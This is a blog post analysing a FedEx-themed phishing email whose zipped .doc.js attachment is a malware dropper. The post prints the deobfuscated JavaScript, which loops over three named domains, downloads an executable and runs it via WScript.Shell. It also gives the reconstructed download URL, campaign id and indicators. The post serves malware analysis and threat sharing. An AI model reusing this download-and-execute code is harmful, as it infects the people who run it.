Something Phishy

by Destruct_Icon
Categories: Analysis, Coding, JavaScript


Something Phishy – Files in Files

Happy new year everyone! This is Destruct_Icon, and one of the things I'd like to start doing this year is writing up some of the phishing e-mails that come in, as posts dubbed "Something Phishy". I have a few e-mail boxes that get hammered by phishing e-mails, but this first one is a bit of a treat as it came straight to our @malwerewolf.com address. Although this e-mail is fairly old, in this first post I'd like to go through the first stages of the analysis and show what we were able to pull out of this campaign.

Looks like one of my parcels has shipped! Good thing Earl Chapman was kind enough to send me the shipping label in the form of an attached zip file. Well, since I was raised to never speak to strangers, let me take a look at the headers of the e-mail and find out who is trying to speak to me.

Alright Magee Corporate Solutions, why are you sending me a FedEx post? Their website says they are "Connecting Success With Your Future". Maybe that means this file will give me success! Let's dive in. Instead of doing this the simple way, how about we pull the attachment out of the raw message source and then go through the motions of converting it into something we can poke at.


I dumped the base64 blob into a file named base64. Then, on a SIFT/REMnux installation, I decoded the file and dropped the result into cows. That's right, cows.


PK FIRE! Alright, this isn't a Ness file: the PK signature means this is a zip archive, and it appears to contain something called label_*.doc.js. Let's unzip it and figure out just what that .doc.js file is.
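The same triage steps in Python, as an added example rather than the post's own tooling: decode the base64 blob pulled from the message source, check the PK signature, list the archive members, and flag anything whose last extension is executable while an inner extension poses as a document, the label_*.doc.js pattern. The zip and its member are constructed here with a harmless placeholder body, and the extension lists are my own assumptions about what to flag.

```python
import base64
import io
import zipfile

# Final extensions that Windows hands to a script host or runs directly (assumed
# list); the "label_*.doc.js" trick relies on the last extension being the one
# that counts.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr"}
# Inner extensions used as decoys to make the member look like a document.
DOCUMENT_DECOYS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".gif", ".jpg"}


def build_sample_attachment() -> str:
    """Constructed sample: a zip holding one label_<n>.doc.js member, base64
    encoded the way the attachment appears in the raw message source. The
    script body is a harmless placeholder, not the dropper from the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("label_48233.doc.js", "// placeholder, does nothing\n")
    return base64.b64encode(buf.getvalue()).decode("ascii")


def triage_attachment(b64_text: str) -> dict:
    """Decode the attachment, identify it by its magic bytes and, for a zip,
    flag members whose final extension is executable, noting any document
    extension used as a decoy in front of it."""
    raw = base64.b64decode(b64_text)
    report = {"magic": raw[:2], "is_zip": raw[:2] == b"PK", "members": [], "suspicious": []}
    if not report["is_zip"]:
        return report
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for name in zf.namelist():
            report["members"].append(name)
            parts = name.lower().rsplit("/", 1)[-1].split(".")
            if len(parts) < 2:
                continue  # no extension at all
            final = "." + parts[-1]
            decoys = [p for p in ("." + x for x in parts[1:-1]) if p in DOCUMENT_DECOYS]
            if final in SCRIPT_EXTENSIONS:
                reason = f"executable extension {final}"
                if decoys:
                    reason += f" behind document extension {decoys[-1]}"
                report["suspicious"].append((name, reason))
    return report


if __name__ == "__main__":
    print(triage_attachment(build_sample_attachment()))
```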


Don't know about you, but I think whoever made this JS had some love for Dragonball, because everything was being appended to the variable SSJ. Let's first use js-beautify and see what we're dealing with.


We see some of the buzzwords like "GET", "VAR" and "Math", which leads me to believe that this is just some obfuscation, if that wasn't already obvious enough. I launched Firebug, let the script build out the variable, and we start getting a clearer picture.


Well, that's pretty. SSJ builds out the function, so let's copy that out and beautify it.

function dl(fr) {
    var b = "www.dominaeweb.com lincolnracing.com alejandrosanchezvejar.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = WScript.CreateObject("WScript.Shell");
        var fn = WScript.ScriptFullName + "." + Math.round(Math.random() * 100000) + ".exe";
        var dn = 0;
        var xo = WScript.CreateObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = WScript.CreateObject("ADODB.Stream");
                xa.type = 1;
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {};
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
        } catch (er) {};
        if (dn == 1) break;

Time to analyze.

  • We have the domains on line 2: "www.dominaeweb.com lincolnracing.com alejandrosanchezvejar.com" (line numbers refer to the full beautified script, not the excerpt above)
  • Line 5 stages the file name the downloaded data is going to be dumped into: var fn = WScript.ScriptFullName + "." + Math.round(Math.random() * 100000) + ".exe";
  • Lines 26 and 27 create the GET request and initiate the pull, but where is it going?
    • "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str
      • We have most of the information here at our fingertips. b is the array from line 2, and the loop iterates through each domain.
      • fr is a bit more complicated, as it isn't referenced until the function is called. The calls are at the bottom of the script on lines 32, 33 and 34. You will see that dl(4841) is the first one attempted.
      • Now str. Where's str? It's not in this little block of text, but looking back at the code, we see that str was defined at the very beginning, where all of the obfuscation started. I pulled this out of Firebug, as it was the only other variable with legitimate data in it: 5551555E00011710161107103B0D070B0A2409050813011601130B08024A070B095E225E0905030101070B16140B16051001170B0811100D0B0A174A070B095E17011614565E555050575D50545256505E56
    • We should have our full URL now: hxxp://www[.]dominaeweb[.]com/document.php?rnd=4841&id=5551555E00011710161107103B0D070B0A2409050813011601130B08024A070B095E225E0905030101070B16140B16051001170B0811100D0B0A174A070B095E17011614565E555050575D50545256505E56
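The post stops at reconstructing the URL, so as an added example (my own, not part of the original analysis) here is one more step: the id= value is hex, and trying every single-byte XOR key against it finds one (0x64) that turns the whole token into clean ASCII. The decoded token is colon separated and contains the recipient address and the sender's domain from the headers, which is how the operator knows which mailbox fetched the payload; the single-byte XOR key is an assumption found by brute force, and the meaning of the remaining fields (the long number reads as a Unix timestamp from early October 2015) is my guess.

```python
# id= value from the download URL reconstructed above (copied from the post).
CAMPAIGN_ID_HEX = (
    "5551555E00011710" "161107103B0D070B" "0A24090508130116" "01130B08024A070B"
    "095E225E09050301" "01070B16140B1605" "1001170B0811100D" "0B0A174A070B095E"
    "17011614565E5550" "50575D5054525650" "5E56"
)

# Characters a clean tracking token is expected to consist of (assumed set).
EXPECTED = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789:@._-")


def token_score(text: bytes) -> int:
    """Number of bytes that decode to an expected character."""
    return sum(1 for b in text if chr(b) in EXPECTED)


def brute_force_xor(hex_id: str) -> tuple[int, str]:
    """Assume a single-byte XOR key (an assumption, checked by the result):
    try all 256 keys and keep the one whose output is entirely clean."""
    data = bytes.fromhex(hex_id)
    candidates = {k: bytes(b ^ k for b in data) for k in range(256)}
    key = max(candidates, key=lambda k: token_score(candidates[k]))
    plain = candidates[key]
    if token_score(plain) != len(plain):
        raise ValueError("no single-byte XOR key yields a clean token")
    return key, plain.decode("ascii")


def split_fields(plain: str) -> list[str]:
    """The decoded token is colon separated; return its fields."""
    return plain.split(":")


if __name__ == "__main__":
    key, plain = brute_force_xor(CAMPAIGN_ID_HEX)
    print(f"key=0x{key:02x} -> {plain}")
    print(split_fields(plain))
```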

I did some quick triage of the executable and found the following, but I didn't go too far down the rabbit hole.

  • Temp directory|AppData\Local\Temp| U s e r s \ a d m i n \ A p p D a t a \ L o c a l \ T e m p \ y e n i . e x e
  • |Dictionary / password|TEST| y e n i . e x e T E S T X9@ 9@ H

The VirusTotal scanners had 27 hits, mostly identifying the malware as Gen:Variant.Symmi. The lessons learned here are nothing particularly new. We have seen many phishing campaigns use Fedex_* or Label_* attachments; I have seen DOC*, PDF, XLS*, GIF*, VBS* and others. I felt it was worth posting about this one as it was the first time I've seen a .JS file directly as the infection vector in the Fedex and Label campaigns. I don't get to spend a lot of time looking at these things, so it could have been used many times, but if there is anything new in this and you have some questions, please contact me! I'd love to chat. I like long walks on the beach during a full moon on a rainy evening: destruct_icon@malwerewolf.com.
